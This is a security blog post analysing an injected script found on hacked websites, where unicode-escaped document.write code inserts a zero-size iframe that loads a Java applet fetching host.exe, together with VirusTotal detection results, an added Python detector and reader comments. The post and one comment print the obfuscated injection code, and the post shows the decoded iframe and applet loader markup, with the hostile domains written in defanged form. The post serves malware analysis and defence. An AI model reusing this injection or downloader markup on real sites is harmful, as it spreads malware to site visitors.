
Injected Script Loads Host.exe Using Hidden Iframes and Java Applets

   27 Dec 10   Filed in Short Attack Reviews, Website exploits

Today, I can see many blacklisted sites where Google reports one of the following three domains as the source of the problem:

  • aubreyserr .com
  • medien-verlag .de
  • yennicq .be

E.g.

Malicious software is hosted on 1 domain(s), including medien-verlag.de/.

The attack is quite interesting so I decided to share results of my initial investigation here.

On infected sites, I found an obfuscated malicious script at the very bottom of the HTML code:

document .write('\u003C\u0049\u0046\u0052\u0041\u004D\u0045\u0020\u006E\u0061\u006D...skipped...\u0074\u0068\u003D\u0022\u0031\u0022\u0020\u006D\u0061\u0072\u0067\u0069\u006E\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0031\u0022\u003E\u003C\u002F\u0049\u0046\u0052\u0041\u004D\u0045\u003E');

Unmask Parasites detects the injected malicious scripts quite well. Here you can see how it looks in a sample report:

Unmask Parasites report

When people load the infected pages, this code injects a hidden iframe:

<IFR AME name="x" src="http://www.medien-verlag .de/ new.htm" width="0" height="0" scrolling="no" frameborder="0" marginwidth="1" marginheight="1"></IFRAM E>

In other variations, the iframe may be from www.aubreyserr .com/ new.htm or www.yennicq .be/ new.htm.

The page loaded by the iframe is very simple:

<html>
<body>
<ap plet name="Java Update" code="Polat.class" archive="Hidden.jar" height="10" width="1">
<param name="url" value="hxxp://www.medien-verlag .de/ host.exe">
</applet>
</p>
<p></p>
</div>
</body></html>

As you can see, it only loads a Java applet (Hidden.jar) with one parameter that points to the “host.exe” file in the root of the same site.
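The decoding and triage step for both halves of this chain, the \uXXXX-obfuscated document.write() that becomes a 0x0 iframe and the landing page whose applet takes a url parameter pointing at an executable, as an added example in Python. It is not code from this post or from Unmask Parasites: the two sample pages are constructed with the placeholder hosts victim.example and malicious-host.example, and the hidden-iframe and executable-parameter heuristics are my own, not the tool's.

```python
"""Decode and triage the injection pattern described above: a document.write()
call whose \\uXXXX-escaped argument becomes a 0x0 iframe, and a landing page
whose Java applet takes a url parameter pointing at an executable.  This is an
added example, not code from Unmask Parasites; the two sample pages below are
constructed and use placeholder hosts (victim.example, malicious-host.example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Decoded form of the injected iframe (same attributes as in the post, placeholder host).
HIDDEN_IFRAME = ('<IFRAME name="x" src="http://malicious-host.example/new.htm" '
                 'width="0" height="0" scrolling="no" frameborder="0" '
                 'marginwidth="1" marginheight="1"></IFRAME>')


def js_unicode_escape(text):
    """Encode text the way the injected script was obfuscated: one \\uXXXX per character."""
    return "".join("\\u%04X" % ord(c) for c in text)


# Constructed infected page: the obfuscated script sits at the very bottom of the HTML.
INFECTED_PAGE = ("<html><body><p>Welcome to my site</p>"
                 "<script>document.write('" + js_unicode_escape(HIDDEN_IFRAME) + "');</script>"
                 "</body></html>")

# Constructed copy of the new.htm landing page loaded by the iframe.
LANDING_PAGE = ('<html><body>'
                '<applet name="Java Update" code="Polat.class" archive="Hidden.jar" height="10" width="1">'
                '<param name="url" value="http://malicious-host.example/host.exe">'
                '</applet></body></html>')

DOC_WRITE_RE = re.compile(r"""document\s*\.\s*write\s*\(\s*(['"])(.*?)\1\s*\)""", re.S)
JS_ESCAPE_RE = re.compile(r"\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})")


def decode_js_escapes(s):
    """Turn \\uXXXX and \\xXX escapes back into the characters they encode."""
    return JS_ESCAPE_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def extract_document_writes(html):
    """Return the decoded string argument of every document.write() call on the page."""
    return [decode_js_escapes(m.group(2)) for m in DOC_WRITE_RE.finditer(html)]


class TagCollector(HTMLParser):
    """Collect the tags relevant to this attack chain, in document order."""
    WATCHED = ("iframe", "applet", "param")

    def __init__(self):
        super().__init__()
        self.events = []

    def handle_starttag(self, tag, attrs):
        if tag in self.WATCHED:
            self.events.append(("start", tag, {k: (v or "") for k, v in attrs}))

    def handle_endtag(self, tag):
        if tag == "applet":
            self.events.append(("end", tag, {}))


def is_hidden(attrs):
    """Zero-size frames (as in this attack) or display:none styling are invisible to the visitor."""
    style = attrs.get("style", "").replace(" ", "").lower()
    return ((attrs.get("width") == "0" and attrs.get("height") == "0")
            or "display:none" in style or "visibility:hidden" in style)


def analyse(html, page_host):
    """Return findings for one page, covering both its static markup and whatever
    its document.write() calls would inject at load time."""
    collector = TagCollector()
    collector.feed(" ".join([html] + extract_document_writes(html)))
    collector.close()
    findings, applet = [], None
    for kind, tag, a in collector.events:
        if tag == "iframe" and is_hidden(a):
            src = a.get("src", "")
            origin = "third-party" if (urlparse(src).hostname or page_host) != page_host else "same-host"
            findings.append("hidden iframe (%sx%s) loads %s %s"
                            % (a.get("width", "?"), a.get("height", "?"), origin, src))
        elif tag == "applet":
            applet = a if kind == "start" else None   # track the enclosing applet for its params
        elif tag == "param" and applet is not None and a.get("name", "").lower() == "url":
            target = a.get("value", "")
            if urlparse(target).path.lower().endswith((".exe", ".scr", ".dll")):
                findings.append("Java applet %s (%s) fetches executable %s"
                                % (applet.get("archive", "?"), applet.get("code", "?"), target))
    return findings


if __name__ == "__main__":
    for name, page, host in (("infected page", INFECTED_PAGE, "victim.example"),
                             ("landing page", LANDING_PAGE, "malicious-host.example")):
        print(name + ":")
        for finding in analyse(page, host):
            print("  " + finding)
```

Running the module reports one finding per sample page: the 0x0 iframe to a third-party new.htm on the infected page, and the applet whose url parameter ends in host.exe on the landing page. Feeding the decoded document.write() output back through the same tag parser is the important part; a scanner that only looks at static markup sees nothing but an escaped string.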

VirusTotal

I decided to check the files using VirusTotal to find out how different anti-virus tools detect them.

Hidden.jar

Only 10 out of 36 tools consider this file malicious. Most of them recognize it as some sort of “Java Downloader”. So I guess all it does is download another malicious file onto a victim’s computer. In this case, the file being downloaded is that “host.exe”. So let’s check this file.

Host.exe

www.medien-verlag.de/host.exe

24 out of 43 tools detect www.medien-verlag.de/host.exe as malicious. Quite a poor detection rate. The following popular AV tools still can’t detect it 11 hours after my initial VirusTotal check: Avast, Kaspersky, Microsoft, Sophos, TrendMicro.

So what about host.exe files from other sites? They seem to be different on each site.

Right now 30 out of 42 tools detect www.yennicq .be/host.exe as malicious. All major anti-viruses (except for Kaspersky and Microsoft) do a good job here.

www.yennicq.be/host.exe

www.aubreyserr .com/host.exe does quite well too: 30 out of 43.

www.aubreyserr .com/host.exe

Malware hosted on legitimate websites

I should also mention that all three domains belong to legitimate websites on three different servers. Once again (as in Gumblar and Koobface), hackers use compromised sites to host malicious files, and then use those files to attack visitors to other hacked third-party sites.

Prevalence

According to Google’s Safe Browsing project, there are currently about 2,000 known infected sites.

Your help is welcome

I’ve only started this investigation today, so a lot remains unclear. E.g. what security hole is used to compromise affected sites? Is the injected script the only modification to the hacked sites? Are there any other domains involved in this attack? etc. If you have answers to these questions or just want to share your thoughts, please join the discussion in the comments.

Reader's Comments (8)

  1.

    [...] This post was mentioned on Twitter by Denis. Denis said: [blog] Injected Script Loads Host.exe Using Hidden Iframes and Java Applets http://bit.ly/eq1At2 – more info required [...]

  2.

    Some of the sites hosted at the data center got infected too. Here is the script they changed in index.html and index.php.

    document write(‘\u003C\u0049\u0046\u0052\u0041\u004D\u0045\u0020\u006E\u0061\u006D\u0065\u003D\u0022\
    u0078\u0022\u0020\u0073\u0072\u0063\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0077\u0077\u0077\u002E\u006E\u0061\u0072\
    u0063\u006F\u0073\u002E\u006E\u006C\u002F\u006E\u0065\u0077\u002E\u0068\u0074\u006D\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003D\
    u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0030\u0022\u0020\u0073\u0063\u0072\u006F\u006C\u006C\u0069\
    u006E\u0067\u003D\u0022\u006E\u006F\u0022\u0020\u0066\u0072\u0061\u006D\u0065\u0062\u006F\u0072\u0064\u0065\u0072\u003D\u0022\u0030\
    u0022\u0020\u006D\u0061\u0072\u0067\u0069\u006E\u0077\u0069\u0064\u0074\u0068\u003D\u0022\u0031\u0022\u0020\u006D\u0061\u0072\u0067\
    u0069\u006E\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0031\u0022\u003E\u003C\u002F\u0049\u0046\u0052\u0041\u004D\u0045\u003E’
    );

    The files were changed on 23rd Dec 2010 around 11:48 PM.

    •

      Thanks.

      The code translates to a similar iframe from “hxxp://www .narcos .nl/ new.htm”

  3.

    SANS ISC has a blog post on what looks like the same malware http://isc.sans.edu/diary.html?storyid=10168

    •

      Indeed, the same malware. It has more detailed information on how the malicious Java downloader works.

      A few more malicious URLs from that post.
      hxxp://benaguasil. net/ new.htm
      hxxp://mavi1. org/ new.htm

  4.

    I’ve been hacked too.
    I had several ‘domains’ hosted on that account, but they only changed 2 index.php files with that redirect.

    I think they entered through a SketchUp document I hosted, but I have no idea how.

  5.

    Got hacked again and this time it is from
    hxxp://caktu.com/new.htm

    The hacker comes in through the HTTP port. Still finding out how they hacked in.

  6.

    I was wondering if the “hosts.exe” causes your Windows’ hosts file to load an acceptable host domain which otherwise would be rejected.
    Anyhow, just a wild thought.